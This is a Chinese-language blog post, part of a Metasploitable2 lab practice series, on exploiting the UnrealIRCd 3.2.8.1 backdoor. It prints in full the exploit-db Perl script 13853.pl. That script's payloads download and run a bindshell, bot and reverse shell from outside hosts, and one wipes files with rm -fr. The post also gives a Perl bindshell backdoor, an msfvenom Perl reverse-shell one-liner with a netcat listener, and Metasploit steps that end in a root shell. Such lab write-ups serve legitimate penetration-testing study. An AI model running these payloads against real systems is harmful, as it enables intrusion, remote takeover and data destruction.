

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/images/dandan.png">
  <link rel="icon" href="/images/dandan.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Encounter">
  <meta name="keywords" content="">
  
    <meta name="description" content="上一篇学习了一下漏洞利用过程中的一些信息收集的准备工作，扫描了一下Metasploitable2的主机，发现好多开放的端口，从今天开始一个一个学习一下试一下能不能利用这些端口来进行一些渗透工作，一直学习就好了。">
<meta property="og:type" content="article">
<meta property="og:title" content="Metasploitable2系列练习-漏洞利用之UnrealIRCd">
<meta property="og:url" content="https://chujian521.github.io/blog/2020/04/28/Metasploitable2%E7%B3%BB%E5%88%97%E7%BB%83%E4%B9%A0-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E4%B9%8BUnrealIRCd/index.html">
<meta property="og:site_name" content="X&#39;s blog">
<meta property="og:description" content="上一篇学习了一下漏洞利用过程中的一些信息收集的准备工作，扫描了一下Metasploitable2的主机，发现好多开放的端口，从今天开始一个一个学习一下试一下能不能利用这些端口来进行一些渗透工作，一直学习就好了。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://chujian521.github.io/%5Cimages%5Cfj44.jpg">
<meta property="og:image" content="https://chujian521.github.io/images/metasploitable2-0.png">
<meta property="og:image" content="https://chujian521.github.io/%5Cimages%5Cmetasploitable2-1.png">
<meta property="og:image" content="https://chujian521.github.io/%5Cimages%5Cmetasploitable2-2.png">
<meta property="og:image" content="https://chujian521.github.io/images/metasploitable2-3.png">
<meta property="og:image" content="https://chujian521.github.io/%5Cimages%5Cmetasploitable2-4.png">
<meta property="og:image" content="https://chujian521.github.io/images/metasploitable2-5.png">
<meta property="og:image" content="https://chujian521.github.io/images/metasploitable2-6.png">
<meta property="og:image" content="https://chujian521.github.io/images/metasploitable2-7.png">
<meta property="og:image" content="https://chujian521.github.io/images/metasploitable2-8.png">
<meta property="og:image" content="https://chujian521.github.io/images/smetasploitable2-9.png">
<meta property="article:published_time" content="2020-04-28T04:25:31.000Z">
<meta property="article:modified_time" content="2022-10-30T04:54:54.703Z">
<meta property="article:author" content="Encounter">
<meta property="article:tag" content="漏洞利用">
<meta property="article:tag" content="Metasploitable2">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://chujian521.github.io/%5Cimages%5Cfj44.jpg">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>Metasploitable2系列练习-漏洞利用之UnrealIRCd - X&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"chujian521.github.io","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":80,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":"88d6a072634686f804175a1f3d287260","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  
    <!-- Baidu Analytics -->
    <script async>
      if (!Fluid.ctx.dnt) {
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?88d6a072634686f804175a1f3d287260";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
      }
    </script>
  

  

  

  

  

  

  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>X&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Metasploitable2系列练习-漏洞利用之UnrealIRCd"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2020-04-28 12:25" pubdate>
          2020年4月28日 中午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          6.2k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          52 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Metasploitable2系列练习-漏洞利用之UnrealIRCd</h1>
            
            
              <div class="markdown-body">
                
                <p><strong>上一篇学习了一下漏洞利用过程中的一些信息收集的准备工作，扫描了一下Metasploitable2的主机，发现好多开放的端口，从今天开始一个一个学习一下试一下能不能利用这些端口来进行一些渗透工作，一直学习就好了。</strong></p>
<p><img src="/%5Cimages%5Cfj44.jpg" srcset="/img/loading.gif" lazyload></p>
<span id="more"></span>

<h2 id="什么是UnrealIRCd"><a href="#什么是UnrealIRCd" class="headerlink" title="什么是UnrealIRCd"></a>什么是UnrealIRCd</h2><p>UnrealIRCd是一款基于 C++ 的开源 IRCD 服务端应用</p>
<p>IRC 一种基于网络的群体聊天方式。可以进行群体聊天也可以进行个人对个人的单独聊天。这种起源于上世纪的聊天技术在当时被很多网友追捧。可惜经过网络信息交流方式日新月异的变化，逐渐被各类聊天软件所淘汰。<br>IRC具有分布式的客户端&#x2F;服务器结构。用户通过IRC软件连接并登录到到一个IRC服务器，可以访问这个服务器以及它所连接的其他服务器上的频道。 选择相应的聊天频道，既可以开始广播式的群里聊天。也可对频道中单独的用户发起聊天。</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap扫描"></a>nmap扫描</h3><p>扫描结果如下：</p>
<p><img src="/images/metasploitable2-0.png" srcset="/img/loading.gif" lazyload></p>
<p>可以看到，有两个关于 Unreal IRCd 的开放端口，分别为 6667 和 6697 </p>
<h3 id="使用hexchat-IRC客户端连接IRC-Server"><a href="#使用hexchat-IRC客户端连接IRC-Server" class="headerlink" title="使用hexchat IRC客户端连接IRC Server"></a>使用hexchat IRC客户端连接IRC Server</h3><p>安装客户端：sudo apt install -y hexchat</p>
<p>太慢的话建议更换kali 源，编辑 &#x2F;etc&#x2F;apt&#x2F;sources.list，注释掉原本的国外源，改用清华或者阿里的源：</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs 1c"><span class="hljs-meta">#阿里云</span><br>deb http:<span class="hljs-comment">//mirrors.aliyun.com/kali kali-rolling main non-free contrib</span><br>deb-src http:<span class="hljs-comment">//mirrors.aliyun.com/kali kali-rolling main non-free contrib</span><br><br><span class="hljs-meta">#清华大学</span><br>deb http:<span class="hljs-comment">//mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free</span><br>deb-src https:<span class="hljs-comment">//mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free</span><br></code></pre></td></tr></table></figure>

<p>安装完成后开启hexchat，添加一个 Metasploitable 2这个服务器：</p>
<p><img src="/%5Cimages%5Cmetasploitable2-1.png" srcset="/img/loading.gif" lazyload></p>
<p>关闭窗口之后点击连接按钮，我们就成功连接到了服务器：</p>
<p><img src="/%5Cimages%5Cmetasploitable2-2.png" srcset="/img/loading.gif" lazyload></p>
<p>在这里我们可以看到version Unreal3.2.8.1，下面我们可以去searchsploit 和 exploit-db 里进行查询评估，看看这个版本的 Unreal IRC 是否存在可被利用的漏洞</p>
<h3 id="Unreal-IRCd-3-2-8-1-漏洞评估"><a href="#Unreal-IRCd-3-2-8-1-漏洞评估" class="headerlink" title="Unreal IRCd 3.2.8.1 漏洞评估"></a>Unreal IRCd 3.2.8.1 漏洞评估</h3><h4 id="Searchsploit"><a href="#Searchsploit" class="headerlink" title="Searchsploit"></a>Searchsploit</h4><p>kali里面使用如下命令：searchsploit unreal ircd 3.2.8.1</p>
<p><img src="/images/metasploitable2-3.png" srcset="/img/loading.gif" lazyload></p>
<p>可以看出该版本有三个可利用漏洞：</p>
<ul>
<li>后门漏洞可在 Metasploit 上利用的 Ruby exploit</li>
<li>本地溢出可造成DOS拒绝服务的 exploit ，但它只适用于 windows ，因此不适用我们的目标 Metasploitable 2 </li>
<li>远程下载和执行 Perl 脚本木马</li>
</ul>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="手动分析利用"><a href="#手动分析利用" class="headerlink" title="手动分析利用"></a>手动分析利用</h3><p>查看payloads脚本内容：</p>
<p>cat &#x2F;usr&#x2F;share&#x2F;exploitdb&#x2F;exploits&#x2F;linux&#x2F;remote&#x2F;13853.pl</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><code class="hljs perl"><span class="hljs-comment">#!/usr/bin/perl</span><br><span class="hljs-comment"># Unreal3.2.8.1 Remote Downloader/Execute Trojan</span><br><span class="hljs-comment"># DO NOT DISTRIBUTE -PRIVATE-</span><br><span class="hljs-comment"># -iHaq (2l8)</span><br><br><span class="hljs-keyword">use</span> Socket;<br><span class="hljs-keyword">use</span> IO::Socket;<br><br><span class="hljs-comment">## Payload options</span><br><span class="hljs-keyword">my</span> $payload1 = <span class="hljs-string">&#x27;AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &amp;&#x27;</span>;<br><span class="hljs-keyword">my</span> $payload2 = <span class="hljs-string">&#x27;AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &amp;&#x27;</span>;<br><span class="hljs-keyword">my</span> $payload3 = <span class="hljs-string">&#x27;AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &amp;&#x27;</span>;<br><span class="hljs-keyword">my</span> $payload4 = <span class="hljs-string">&#x27;AB; killall ircd&#x27;</span>;<br><span class="hljs-keyword">my</span> $payload5 = <span class="hljs-string">&#x27;AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *&#x27;</span>;<br><span class="hljs-comment">##Payload 1：使用 wget 下载和绑定一个 shell，并保存文件为 bindshell，赋予其执行权限，并进行执行。</span><br><span class="hljs-comment">##Payload 2：下载一个名为 bot 的文件，我们只能猜测它的选项到底是什么。</span><br><span class="hljs-comment">##Payload 3：下载一个文件，并保存为 rshell 。设置正确的权限，并执行文件。我们只能猜测，下载的有效载荷是一个反向的 shell 。</span><br><span class="hljs-comment">##Payload 4：停止 Unreal IRCD 服务。</span><br><span class="hljs-comment">##Payload 5：从服务器上删除 Unreal IRCD 服务。</span><br><br><span class="hljs-comment">##继续进行下一个代码块的分析，它是进行参数的检索及验证的，并打印其使用的相关信息在控制台上。</span><br><br>$host = <span class="hljs-string">&quot;&quot;</span>;<br>$port = <span class="hljs-string">&quot;&quot;</span>;<br>$type = <span class="hljs-string">&quot;&quot;</span>;<br>$host = @ARGV[<span class="hljs-number">0</span>];<br>$port = @ARGV[<span class="hljs-number">1</span>];<br>$type = @ARGV[<span class="hljs-number">2</span>];<br><br><span class="hljs-keyword">if</span> ($host eq <span class="hljs-string">&quot;&quot;</span>) &#123; usage(); &#125;<br><span class="hljs-keyword">if</span> ($port eq <span class="hljs-string">&quot;&quot;</span>) &#123; usage(); &#125;<br><span class="hljs-keyword">if</span> ($type eq <span class="hljs-string">&quot;&quot;</span>) &#123; usage(); &#125;<br><br><span class="hljs-function"><span class="hljs-keyword">sub</span> <span class="hljs-title">usage</span> </span>&#123;<br>  <span class="hljs-keyword">printf</span> <span class="hljs-string">&quot;\nUsage :\n&quot;</span>;<br>  <span class="hljs-keyword">printf</span> <span class="hljs-string">&quot;perl unrealpwn.pl &lt;host&gt; &lt;port&gt; &lt;type&gt;\n\n&quot;</span>;<br>  <span class="hljs-keyword">printf</span> <span class="hljs-string">&quot;Command list :\n&quot;</span>;<br>  <span class="hljs-keyword">printf</span> <span class="hljs-string">&quot;[1] - Perl Bindshell\n&quot;</span>;<br>  <span class="hljs-keyword">printf</span> <span class="hljs-string">&quot;[2] - Perl Reverse Shell\n&quot;</span>;<br>  <span class="hljs-keyword">printf</span> <span class="hljs-string">&quot;[3] - Perl Bot\n&quot;</span>;<br>  <span class="hljs-keyword">printf</span> <span class="hljs-string">&quot;-----------------------------\n&quot;</span>;<br>  <span class="hljs-keyword">printf</span> <span class="hljs-string">&quot;[4] - shutdown ircserver\n&quot;</span>;<br>  <span class="hljs-keyword">printf</span> <span class="hljs-string">&quot;[5] - delete ircserver\n&quot;</span>;<br>  <span class="hljs-keyword">exit</span>(<span class="hljs-number">1</span>);<br>&#125;<br><span class="hljs-comment">##头 3 行设置了三个初始化为空的变量，分别为 host, port 和 type  ，接着它们被分别赋予了变量值。下面开始判断这 3 个变量是否为空值，如果为空则执行 usage 函数。这将会退出脚本的执行，因为最后一行代码为 exit(1)，即程序发生错误则退出执行。在使用说明中，我们可以看到，有 5 种不同的类型的 payload 可以用来利用这个漏洞。并且分别做了相应的号码排序。当我们仔细查看以上脚本内容，我们可以发现，类型 2 的 payload 和类型 3 的 payload 进行了切换</span><br><br><span class="hljs-function"><span class="hljs-keyword">sub</span> <span class="hljs-title">unreal_trojan</span> </span>&#123;<br>  <span class="hljs-keyword">my</span> $ircserv = $host;<br>  <span class="hljs-keyword">my</span> $ircport = $port;<br>  <span class="hljs-keyword">my</span> $sockd = IO::Socket::INET-&gt;new (<span class="hljs-string">PeerAddr =&gt;</span> $ircserv, <span class="hljs-string">PeerPort =&gt;</span> $ircport, <span class="hljs-string">Proto =&gt;</span> <span class="hljs-string">&quot;tcp&quot;</span>) || <span class="hljs-keyword">die</span> <span class="hljs-string">&quot;Failed to connect to $ircserv on $ircport ...\n\n&quot;</span>;<br>  <span class="hljs-keyword">print</span> <span class="hljs-string">&quot;[+] Payload sent ...\n&quot;</span>;<br>  <span class="hljs-keyword">if</span> ($type eq <span class="hljs-string">&quot;1&quot;</span>) &#123;<br>    <span class="hljs-keyword">print</span> $sockd <span class="hljs-string">&quot;$payload1&quot;</span>;<br>  &#125; <span class="hljs-keyword">elsif</span> ($type eq <span class="hljs-string">&quot;2&quot;</span>) &#123;<br>    <span class="hljs-keyword">print</span> $sockd <span class="hljs-string">&quot;$payload2&quot;</span>;<br>  &#125; <span class="hljs-keyword">elsif</span> ($type eq <span class="hljs-string">&quot;3&quot;</span>) &#123;<br>    <span class="hljs-keyword">print</span> $sockd <span class="hljs-string">&quot;$payload3&quot;</span>;<br>  &#125; <span class="hljs-keyword">elsif</span> ($type eq <span class="hljs-string">&quot;4&quot;</span>) &#123;<br>    <span class="hljs-keyword">print</span> $sockd <span class="hljs-string">&quot;$payload4&quot;</span>;<br>  &#125; <span class="hljs-keyword">elsif</span> ($type eq <span class="hljs-string">&quot;5&quot;</span>) &#123;<br>    <span class="hljs-keyword">print</span> $sockd <span class="hljs-string">&quot;$payload5&quot;</span>;<br>  &#125; <span class="hljs-keyword">else</span> &#123;<br>    <span class="hljs-keyword">printf</span> <span class="hljs-string">&quot;\nInvalid Option ...\n\n&quot;</span>;<br>    usage();<br>  &#125;<br>  <span class="hljs-keyword">close</span>($sockd);<br>  <span class="hljs-keyword">exit</span>(<span class="hljs-number">1</span>);<br>&#125;<br><span class="hljs-comment">##在这个代码块中对应的 payload 分别进行执行，类型 1 执行 payload 1, 类型 2 执行 payload 2 等</span><br>unreal_trojan();<br></code></pre></td></tr></table></figure>

<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs perl"><span class="hljs-comment">#!/usr/bin/perl </span><br><span class="hljs-comment"># *** Synnergy Networks </span><br><span class="hljs-comment"># * Description: </span><br><span class="hljs-comment"># # Remote unix shell backdoor. </span><br><span class="hljs-comment"># * Author: # # headflux (hf@synnergy.net) # Synnergy Networks (c) 1999, http://www.synnergy.net </span><br><span class="hljs-comment"># * Usage: </span><br><span class="hljs-comment"># remote.com$ ./nohup bindshell.pl &amp; </span><br><span class="hljs-comment"># remote.com$ exit </span><br><span class="hljs-comment"># Connection closed by foreign host </span><br><span class="hljs-comment"># localhost$ telnet remote.com 60000 </span><br><span class="hljs-comment"># Trying 192.168.1.1... </span><br><span class="hljs-comment"># Connected to remote.com. </span><br><span class="hljs-comment"># Escape character is &#x27;^]&#x27;. </span><br><span class="hljs-comment"># (user@remote.com:/home/user/) </span><br><span class="hljs-comment"># cat /etc/passwd; etc </span><br><span class="hljs-comment"># *** Synnergy Networks use Socket; </span><br>$port = <span class="hljs-number">60000</span>; $proto = <span class="hljs-keyword">getprotobyname</span>(<span class="hljs-string">&#x27;tcp&#x27;</span>); $cmd = <span class="hljs-string">&quot;lpd&quot;</span>; $system = <span class="hljs-string">&#x27;echo &quot;(`whoami`@`uname -n`:`pwd`)&quot;; /bin/sh&#x27;</span>; $0 = $cmd; <span class="hljs-keyword">socket</span>(SERVER, PF_INET, SOCK_STREAM, $proto) <span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span> <span class="hljs-string">&quot;socket:$!&quot;</span>; <span class="hljs-keyword">setsockopt</span>(SERVER, SOL_SOCKET, SO_REUSEADDR, <span class="hljs-keyword">pack</span>(<span class="hljs-string">&quot;l&quot;</span>, <span class="hljs-number">1</span>)) <span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span> <span class="hljs-string">&quot;setsockopt: $!&quot;</span>; <span class="hljs-keyword">bind</span>(SERVER, sockaddr_in($port, INADDR_ANY)) <span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span> <span class="hljs-string">&quot;bind: $!&quot;</span>; <span class="hljs-keyword">listen</span>(SERVER, SOMAXCONN) <span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span> <span class="hljs-string">&quot;listen: $!&quot;</span>; <span class="hljs-keyword">for</span>(; $paddr = <span class="hljs-keyword">accept</span>(CLIENT, SERVER); <span class="hljs-keyword">close</span> CLIENT) &#123; <span class="hljs-keyword">open</span>(STDIN, <span class="hljs-string">&quot;&gt;&amp;CLIENT&quot;</span>); <span class="hljs-keyword">open</span>(STDOUT, <span class="hljs-string">&quot;&gt;&amp;CLIENT&quot;</span>); <span class="hljs-keyword">open</span>(STDERR, <span class="hljs-string">&quot;&gt;&amp;CLIENT&quot;</span>); <span class="hljs-keyword">system</span>($system); <span class="hljs-keyword">close</span>(STDIN); <span class="hljs-keyword">close</span>(STDOUT); <span class="hljs-keyword">close</span>(STDERR); &#125; <br></code></pre></td></tr></table></figure>



<h4 id="修改-Unreal-IRCD-3-2-8-1-exploit"><a href="#修改-Unreal-IRCD-3-2-8-1-exploit" class="headerlink" title="修改 Unreal IRCD 3.2.8.1 exploit"></a>修改 Unreal IRCD 3.2.8.1 exploit</h4><p>因为我们不能控制它下载了一个什么payload，所以我们可以修改payload以取得有效控制：</p>
<ol>
<li>使用 msfvenom 生成一个 reverse shell payload。</li>
<li>修改 exploit 代码。</li>
<li>使用 Netcat 获取一个 reverse shell。</li>
</ol>
<p>当前的 Perl 脚本的一个主要缺点是，它依赖于成功的利用及执行 wget 命令才能成功下载。因此，如果 wget 命令不在目标主机上，则会利用失败。下面将使用 msfvenom 生成一个 Perl 脚本的 payload 摆脱这种依赖和不可控性。命令如下：</p>
<p>msfvenom -p cmd&#x2F;unix&#x2F;reverse_perl LHOST&#x3D;192.168.52.134 LPORT&#x3D;4444 -f raw</p>
<p><img src="/%5Cimages%5Cmetasploitable2-4.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">perl</span> -MIO -e <span class="hljs-string">&#x27;<span class="hljs-variable">$p</span>=fork;exit,if(<span class="hljs-variable">$p</span>);foreach my <span class="hljs-variable">$key</span>(keys %ENV)&#123;if(<span class="hljs-variable">$ENV</span>&#123;<span class="hljs-variable">$key</span>&#125;=~/(.*)/)&#123;<span class="hljs-variable">$ENV</span>&#123;<span class="hljs-variable">$key</span>&#125;=<span class="hljs-variable">$1</span>;&#125;&#125;<span class="hljs-variable">$c</span>=new IO::Socket::INET(PeerAddr,&quot;192.168.52.134:4444&quot;);STDIN-&gt;fdopen(<span class="hljs-variable">$c</span>,r);$~-&gt;fdopen(<span class="hljs-variable">$c</span>,w);while(&lt;&gt;)&#123;if(<span class="hljs-variable">$_</span>=~ /(.*)/)&#123;system <span class="hljs-variable">$1</span>;&#125;&#125;;&#x27;</span><br></code></pre></td></tr></table></figure>

<p>替换掉原本的payload，注意单引号用反斜线转义。</p>
<p>然后使用Netcat开启一个侦听：nc -lvp 4444</p>
<p>然后执行exploit：perl 13853.pl [target IP] [port] 1</p>
<p>我们就获取一个反向shell，并且是root权限：</p>
<p><img src="/images/metasploitable2-5.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="Metasploit-Unreal-IRCD-3-2-8-1-漏洞自动利用"><a href="#Metasploit-Unreal-IRCD-3-2-8-1-漏洞自动利用" class="headerlink" title="Metasploit  Unreal IRCD 3.2.8.1 漏洞自动利用"></a>Metasploit  Unreal IRCD 3.2.8.1 漏洞自动利用</h3><p>启动 msfconsole ，并搜索 Unreal IRCD 相关利用模块：</p>
<p><img src="/images/metasploitable2-6.png" srcset="/img/loading.gif" lazyload></p>
<p>使用选中模块：use exploit&#x2F;unix&#x2F;irc&#x2F;unreal_ircd_3281_backdoor</p>
<p>查看可用 payloads ： show payloads</p>
<p><img src="/images/metasploitable2-7.png" srcset="/img/loading.gif" lazyload></p>
<p>选一个payload：set payload cmd&#x2F;unix&#x2F;reverse_perl</p>
<p>查看并配置相关选项：</p>
<p>show options<br>set rhost [target ip]<br>set lhost [attack ip]</p>
<p><img src="/images/metasploitable2-8.png" srcset="/img/loading.gif" lazyload></p>
<p>最后执行exploit：run</p>
<p><img src="/images/smetasploitable2-9.png" srcset="/img/loading.gif" lazyload></p>
<p>成功获取到了一个root权限的shell！</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">#漏洞利用</a>
      
        <a href="/tags/Metasploitable2/">#Metasploitable2</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Metasploitable2系列练习-漏洞利用之UnrealIRCd</div>
      <div>https://chujian521.github.io/blog/2020/04/28/Metasploitable2系列练习-漏洞利用之UnrealIRCd/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Encounter</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2020年4月28日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
